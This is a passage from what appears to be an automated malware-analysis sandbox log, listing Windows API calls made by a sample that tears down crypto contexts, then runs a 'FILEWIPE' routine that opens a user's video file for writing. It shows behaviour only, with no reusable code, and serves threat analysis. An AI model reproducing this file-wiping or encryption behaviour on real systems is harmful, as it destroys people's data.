hHeap=0x770000) returned 1 [0043.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.604] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.604] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.604] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.604] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0043.604] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.608] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.608] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.610] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.610] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.610] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0043.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.611] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.611] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0043.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.611] CryptDestroyKey (hKey=0x7c2200) returned 1 [0043.611] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.611] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.611] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0043.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.611] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.611] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.611] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0043.611] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.611] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.612] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.612] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0043.612] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0043.612] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.612] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.612] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0043.612] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.612] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.612] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.612] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.612] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.612] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.612] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.612] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.613] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.613] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.613] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.613] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0043.613] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.613] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.613] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0043.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.613] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.613] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0043.613] FreeLibrary (hLibModule=0x754b0000) returned 1 [0043.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0043.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0043.613] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0043.613] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.613] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.614] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.614] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.615] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.615] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0043.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0043.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.615] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e74b20, ftCreationTime.dwHighDateTime=0x1d5bb8b, ftLastAccessTime.dwLowDateTime=0xdefd32c0, ftLastAccessTime.dwHighDateTime=0x1d5be59, ftLastWriteTime.dwLowDateTime=0xdefd32c0, ftLastWriteTime.dwHighDateTime=0x1d5be59, nFileSizeHigh=0x0, nFileSizeLow=0x6c58, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MB6 kn.avi", cAlternateFileName="MB6KN~1.AVI")) returned 0x7c2100 [0043.615] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0043.615] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.615] CharLowerBuffW (in: lpsz="byte[27736]", cchLength=0xb | out: lpsz="byte[27736]") returned 0xb [0043.615] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.615] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.616] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.616] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0043.616] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0043.616] FreeLibrary (hLibModule=0x76b40000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.616] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0043.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.617] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.617] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.617] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.617] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.618] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0043.618] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.618] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\mb6 kn.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0043.618] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.618] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.618] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0043.618] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.618] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.618] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.619] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.619] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.619] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0043.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.619] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.619] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.619] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, 